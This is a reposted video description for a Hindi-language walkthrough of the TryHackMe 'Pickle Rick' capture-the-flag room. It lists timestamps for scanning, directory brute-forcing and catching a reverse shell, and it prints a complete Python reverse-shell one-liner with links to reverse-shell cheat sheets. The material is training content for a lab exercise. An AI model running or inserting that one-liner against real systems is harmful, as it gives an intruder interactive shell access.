Linux serverlinux web serverNETWORK ADMINISTRATIONS

Pickle Rick Walkthrough TryHackMe [in HINDI] | CTF #1 (2021)

Hi and welcome to payload10 Youtube channel, here on payload10 channel you will find stuffs related to hacking and cybersecurity.

As you now there are not much hindi channels related to cybersecurity and so I am making videos in hindi, so that language isn’t a barrier for education.

Timestamps
0:00 – Intro
0:22 – Get Started
1:30 – Nmap Scan
2:02 – GoBuster to find hidden directories
11:55 – Setting netcat to obtain reverse shell
13:35 – First Ingredient
15:00 – Second Ingredient
17:25 – Third Ingredient
18:10 – Room Complete
18:25 – Ending

This video is about a simple webserver exploitation which is pickle rick walkthrough from tryhackme that will help you understand what a simple webserver exploitation looks like. Even if you are new to hacking and i have prepared the video in a manner that if you know some basic linux and some web technologies, you will understand it in a great manner.

Let’s help Rick to convert himself back into a Human form by finding the Ingredients in this pickle rick walkthrough.This video will help get a basic idea of what a simple CTF looks like..

#ctf #tryhackme #penetration testing #picklerickwalkthrough #tryhackmewalkthrough #picklerickwalkthroughtryhackme #simplewebserverexploitation #exploitation#hacking #capturetheflags #walkthrough #hack

Pickle Rick Walkthrough, with normal web interface and with Python Reverse Shell.

Python Reverse shell:

Just change IP to your tun0 IP and Port to whatever port you want to listen the incoming connection on.

====================================================================

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“IP”,PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

====================================================================

Link to payloadallthethings github: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Link to Pentest monkey’s cheatsheet: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

If you find the video helpful. Please do Subscribe the channel and share the video.

source

by payload10

linux web server

Leave a Reply

Your email address will not be published. Required fields are marked *